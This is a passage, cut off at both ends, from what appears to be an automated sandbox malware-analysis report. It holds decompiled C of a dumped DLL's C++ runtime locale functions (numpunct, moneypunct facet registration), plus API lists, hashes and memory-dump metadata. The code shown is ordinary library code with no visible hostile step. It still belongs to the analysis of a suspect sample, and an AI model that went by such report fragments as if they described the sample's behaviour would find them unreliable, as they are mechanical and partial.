							if(_t226 != 0) {
								L12:
								E6DDD66BA(_t242 - 0x14);
								return E6DDF0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6DDE14EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t242 - 0x20);
										E6DDF3D74(_t242 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t172, _t226, _t232, 0x14);
										E6DDD6653(_t242 - 0x14, 0);
										_t233 =  *0x6de96dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6DDB161C(0x6de96d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6DDD66BA(_t242 - 0x14);
											return E6DDF0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6DDE1558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t242 - 0x20);
													E6DDF3D74(_t242 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t172, _t227, _t233, 0x14);
													E6DDD6653(_t242 - 0x14, 0);
													_t234 =  *0x6de96e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6DDB161C(0x6de96dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6DDD66BA(_t242 - 0x14);
														return E6DDF0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6DDE15C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t242 - 0x20);
																E6DDF3D74(_t242 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t172, _t228, _t234, 0x14);
																E6DDD6653(_t242 - 0x14, 0);
																_t235 =  *0x6de96dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6DDB161C(0x6de96d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6DDD66BA(_t242 - 0x14);
																	return E6DDF0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6DDE162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6DDB1438(_t207);
																			E6DDF3D74(_t242 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de3851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6de3c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6DDE542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6DDF0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6DDD6FD3(__eflags, _t229);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6de96dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6DDD6FD3(__eflags, _t228);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6de96e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6DDD6FD3(__eflags, _t227);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6de96dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6DDD6FD3(__eflags, _t226);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6de96dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6DDD6FD3(__eflags, _t225);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6de96de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFA02
int.LIBCPMT ref: 6DDDFA19

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

numpunct.LIBCPMT ref: 6DDDFA3C
std::_Facet_Register.LIBCPMT ref: 6DDDFA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFA91

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 087f9d86eaaadbd709a7a33f0fdf863f87e3b7a8835653503d254aeb1af545d9
Instruction ID: f4cd8d3ed556c2c5fe17936270260012bc049f072632098db308f716c4ae7035
Opcode Fuzzy Hash: 087f9d86eaaadbd709a7a33f0fdf863f87e3b7a8835653503d254aeb1af545d9
Instruction Fuzzy Hash: F811C275908129DBCF01FBA4C840AFDB7B4AF84718F264109F611AB290DF74A902CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB9E4, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t198 - 0x14, 0);
				_t189 =  *0x6de96e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6DDB161C(0x6de96e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6DDD66BA(_t198 - 0x14);
					return E6DDF0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6DDEC120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t198 - 0x20);
							E6DDF3D74(_t198 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t184, _t189, 0x14);
							E6DDD6653(_t198 - 0x14, 0);
							_t190 =  *0x6de96e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6DDB161C(0x6de96e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6DDD66BA(_t198 - 0x14);
								return E6DDF0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6DDEC1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t198 - 0x20);
										E6DDF3D74(_t198 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t141, _t185, _t190, 0x14);
										E6DDD6653(_t198 - 0x14, 0);
										_t191 =  *0x6de96e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6DDB161C(0x6de96e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6DDD66BA(_t198 - 0x14);
											return E6DDF0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6DDEC229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t198 - 0x20);
													E6DDF3D74(_t198 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t141, _t186, _t191, 0x14);
													E6DDD6653(_t198 - 0x14, 0);
													_t192 =  *0x6de96e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6DDB161C(0x6de96e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6DDD66BA(_t198 - 0x14);
														return E6DDF0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6DDEC295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6DDB1438(_t169);
																E6DDF3D74(_t198 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de3851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6de3c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6DDED028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6DDF0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6DDD6FD3(__eflags, _t187);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6de96e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6DDD6FD3(__eflags, _t186);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6de96e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6DDD6FD3(__eflags, _t185);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6de96e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6DDD6FD3(__eflags, _t184);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6de96e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEB9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB9F5
int.LIBCPMT ref: 6DDEBA0C

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDEBA2F
std::_Facet_Register.LIBCPMT ref: 6DDEBA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBA84

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 46c0442b7c120d926259c641d21e07f24c755e21b0befaf1d8b053191f72510d
Instruction ID: 6e8b8521c264e5a2c4bb314263795dc538beb8163a31158d800cfea8a76f15fa
Opcode Fuzzy Hash: 46c0442b7c120d926259c641d21e07f24c755e21b0befaf1d8b053191f72510d
Instruction Fuzzy Hash: 6611C675808219DBCF05FB64C840BFDB7B4AF45718F174009F511AB290DFB4AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DDEBA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t154 - 0x14, 0);
				_t147 =  *0x6de96e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6DDB161C(0x6de96e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6DDD66BA(_t154 - 0x14);
					return E6DDF0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6DDEC1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t154 - 0x20);
							E6DDF3D74(_t154 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t143, _t147, 0x14);
							E6DDD6653(_t154 - 0x14, 0);
							_t148 =  *0x6de96e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6DDB161C(0x6de96e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6DDD66BA(_t154 - 0x14);
								return E6DDF0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6DDEC229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t154 - 0x20);
										E6DDF3D74(_t154 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t110, _t144, _t148, 0x14);
										E6DDD6653(_t154 - 0x14, 0);
										_t149 =  *0x6de96e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6DDB161C(0x6de96e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6DDD66BA(_t154 - 0x14);
											return E6DDF0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6DDEC295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6DDB1438(_t131);
													E6DDF3D74(_t154 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de3851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6de3c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6DDED028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6DDF0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6DDD6FD3(__eflags, _t145);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6de96e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6DDD6FD3(__eflags, _t144);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6de96e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6DDD6FD3(__eflags, _t143);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6de96e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEBA91
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBA9B
int.LIBCPMT ref: 6DDEBAB2

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDEBAD5
std::_Facet_Register.LIBCPMT ref: 6DDEBAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBB2A

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 3bb58c6b522b429ed7bddc803a4d8c9068438ad26b35e1e6af61c9c6581bb5ff
Instruction ID: 0cf3da71255439a8acf546b93b7e7438ea7695fb59441a2a2dfec952350669b0
Opcode Fuzzy Hash: 3bb58c6b522b429ed7bddc803a4d8c9068438ad26b35e1e6af61c9c6581bb5ff
Instruction Fuzzy Hash: 2311C276908219DBCF01FBA4C840AFEB7B4AF45318F270009F511AB290DFB4AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF567, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t550 - 0x14, 0);
				_t525 =  *0x6de96df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6DDB161C(0x6de96da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6DDD66BA(_t550 - 0x14);
					return E6DDF0075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6DDE1127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t550 - 0x20);
							E6DDF3D74(_t550 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t512, _t525, 0x14);
							E6DDD6653(_t550 - 0x14, 0);
							_t526 =  *0x6de96df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6DDB161C(0x6de96da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6DDD66BA(_t550 - 0x14);
								return E6DDF0075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6DDE11AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t550 - 0x20);
										E6DDF3D74(_t550 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t389, _t513, _t526, 0x14);
										E6DDD6653(_t550 - 0x14, 0);
										_t527 =  *0x6de96dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6DDB161C(0x6de96d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6DDD66BA(_t550 - 0x14);
											return E6DDF0075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6DDE1230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t550 - 0x20);
													E6DDF3D74(_t550 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t389, _t514, _t527, 0x14);
													E6DDD6653(_t550 - 0x14, 0);
													_t528 =  *0x6de96dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6DDB161C(0x6de96d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6DDD66BA(_t550 - 0x14);
														return E6DDF0075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6DDE12B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t550 - 0x20);
																E6DDF3D74(_t550 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t389, _t515, _t528, 0x14);
																E6DDD6653(_t550 - 0x14, 0);
																_t529 =  *0x6de96dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6DDB161C(0x6de96d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6DDD66BA(_t550 - 0x14);
																	return E6DDF0075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6DDE1339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t550 - 0x20);
																			E6DDF3D74(_t550 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t389, _t516, _t529, 0x14);
																			E6DDD6653(_t550 - 0x14, 0);
																			_t530 =  *0x6de96db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6DDB161C(0x6de96d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6DDD66BA(_t550 - 0x14);
																				return E6DDF0075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6DDE13A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t550 - 0x20);
																						E6DDF3D74(_t550 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t389, _t517, _t530, 0x14);
																						E6DDD6653(_t550 - 0x14, 0);
																						_t531 =  *0x6de96ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6DDB161C(0x6de96d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
